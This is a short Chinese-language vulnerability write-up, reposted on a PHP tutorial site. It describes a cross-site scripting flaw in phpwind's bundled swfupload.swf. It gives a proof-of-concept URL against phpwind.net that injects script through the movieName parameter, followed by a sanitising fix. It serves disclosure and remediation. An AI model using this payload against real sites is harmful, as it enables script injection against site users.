来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 直接给详细信息1、先来说下http://www.phpwind.net/res/js/dev/util_libs/swfupload/Flash/swfupload.swf 这个flash文件存在漏洞,其实看文件名称是不是很似曾相识?还记得wordpress之前的flash文件漏洞么?不...
|
直接给详细信息
1、先来说下http://www.phpwind.net/res/js/dev/util_libs/swfupload/Flash/swfupload.swf 这个flash文件存在漏洞,其实看文件名称是不是很似曾相识?还记得wordpress之前的flash文件漏洞么?
不知道的看这边:
http://packetstormsecurity.com/files/118059/SWF-Upload-Cross-Site-Scripting.html
2、所以我们连反编译的力气都省去了,直接构造poc:
http://www.phpwind.net/res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//
是不是触发了?
http://www.phpwind.net/res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//
修复方案:
1、这个我记得后来的修复方法应该是:
var replacePattern:* = /[^a-zA-Z0-9_]/g;
this.movieName = this.movieName.replace(replacePattern, "");
最好是直接使用修复过的版本
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
